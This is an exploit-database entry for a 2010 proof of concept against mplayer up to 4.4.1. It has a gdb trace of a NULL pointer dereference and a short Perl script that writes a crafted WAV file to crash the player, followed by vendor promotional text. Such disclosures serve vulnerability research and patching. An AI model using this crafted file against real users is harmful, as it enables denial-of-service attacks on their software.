Lucene search
+L

mplayer <= 4.4.1 NULL pointer dereference exploit PoC

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 9 Views

mplayer <= 4.4.1 NULL pointer dereference exploit Po

Code

                                                # Exploit Title: mplayer &#60;= 4.4.1 NULL pointer dereference exploit poc 0 day
# Date: 17/03/2010
# Author: Pietro Oliva
# Software Link: 
# Version: &#60;= 4.4.1
# Tested on: ubuntu 9.10 but should work in windows too
# CVE :  

#Program received signal SIGSEGV, Segmentation fault.
#0x081176d8 in af_calc_filter_multiplier ()
#(gdb) disas af_calc_filter_multiplier 
#Dump of assembler code for function af_calc_filter_multiplier:
#0x081176d0 &#60;af_calc_filter_multiplier+0&#62;:	push   %ebp
#0x081176d1 &#60;af_calc_filter_multiplier+1&#62;:	mov    %esp,%ebp
#0x081176d3 &#60;af_calc_filter_multiplier+3&#62;:	fld1   
#0x081176d5 &#60;af_calc_filter_multiplier+5&#62;:	mov    0x8(%ebp),%eax
#0x081176d8 &#60;af_calc_filter_multiplier+8&#62;:	mov    (%eax),%eax	==&#62; mplayer tries to dereference eax, which is a NULL pointer!!! 	
#0x081176da &#60;af_calc_filter_multiplier+10&#62;:	lea    0x0(%esi),%esi
#0x081176e0 &#60;af_calc_filter_multiplier+16&#62;:	fmull  0x28(%eax)
#0x081176e3 &#60;af_calc_filter_multiplier+19&#62;:	mov    0x18(%eax),%eax
#0x081176e6 &#60;af_calc_filter_multiplier+22&#62;:	test   %eax,%eax
#0x081176e8 &#60;af_calc_filter_multiplier+24&#62;:	jne    0x81176e0 &#60;af_calc_filter_multiplier+16&#62;
#0x081176ea &#60;af_calc_filter_multiplier+26&#62;:	pop    %ebp
#0x081176eb &#60;af_calc_filter_multiplier+27&#62;:	ret    
#End of assembler dump.

# REGISTERS:
#eax            0x0	0	==========&#62; NULL
#ecx            0xfa157a57	-99255721
#edx            0x1fe0	8160
#ebx            0x8509a08	139500040
#esp            0xbfffe2e8	0xbfffe2e8
#ebp            0xbfffe2e8	0xbfffe2e8
#esi            0x7b84000	129515520
#edi            0xf8000	1015808
#eip            0x81176d8	0x81176d8 &#60;af_calc_filter_multiplier+8&#62;
#eflags         0x10216	[ PF AF IF RF ]
#cs             0x73	115
#ss             0x7b	123
#ds             0x7b	123
#es             0x7b	123
#fs             0x0	0
#gs             0x33	51



#!/usr/bin/perl

print &#34;[+] mplayer &#60;= 4.4.1 NULL pointer dereference exploit poc 0 day by Pietro Oliva\n&#34;;
print &#34;[+] pietroliva[at]gmail[dot]com  http://olivapietro.altervista.org\n&#34;;
print &#34;[+] creating crafted file mplayer.wav\n&#34;;
$buffer=&#34;\x52\x49\x46\x46\x1f\x04\x00\x00\x57\x41\x56\x45\x66\x6d\x74\x20\x10\x00\x00\x00\x01\x00\x1f&#34;;
open(file,&#34;&#62; mplayer.wav&#34;);
print(file $buffer);
print &#34;[+] done!\n&#34;;

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
9